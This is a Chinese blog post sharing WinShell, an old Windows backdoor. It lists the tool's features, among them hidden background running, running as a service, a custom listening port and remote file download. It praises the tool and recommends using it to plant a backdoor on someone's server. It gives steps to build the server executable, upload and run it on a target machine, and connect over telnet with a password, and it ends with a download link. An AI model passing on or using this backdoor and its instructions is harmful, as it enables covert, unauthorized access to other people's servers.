WinShell后门程序分享

发布于 2020-12-04  525 次阅读


WinShell
WinShell是一个后门程序,由孤独剑客在2004年编写的。至今仍可使用,真他妈牛皮。
以下资料来自百度百科:
WinShell是一个运行在Windows平台上的Telnet服务器软件,主程序是一个仅仅6k大小的exe文件,可完全独立执行而不依赖于任何系统动态连接库。
支持定制端口、密码保护、多用户登录、NT服务方式、远程文件下载、信息自定义及独特的反DDOS功能等。具体功能如下:
1、支持Windows 9x/me/nt/2k/xp
2、仅仅一个exe文件,无需安装,绿色环保
3、支持所有标准Telnet客户端软件
4、多线程设计支持无限用户同时登录
5、可自定义监听端口,默认是5277
6、后台方式运行,无影无踪
7、支持NT下以服务方式运行,且可自定义服务信息
综上所诉,WinShell是一个牛逼人写的牛逼程序,并且现在还有使用的价值。比如给某某某的服务器留后门。
使用方法
按照生成界面生成服务端,生成步骤不用解释了,看着来,很简单。
WinShell后门程序分享
生成后可以得到一个exe程序,这就是百度介绍的仅有6kb的主程序,把它上传到要留后门的服务器然后运行。然后telnet IP 端口 进行连接。

按照提示输入密码,密码正确连接成功。输入?可以查看WinShell的命令,输入s即可像用命令操作本地一样操作目标服务器。

WinShell下载
统一提取码为WDNM!点击文字即可跳转到下载页面!不喜勿喷!
WinShell下载

剑谱第一页,忘掉心上人。心中无女人,拔刀自然神。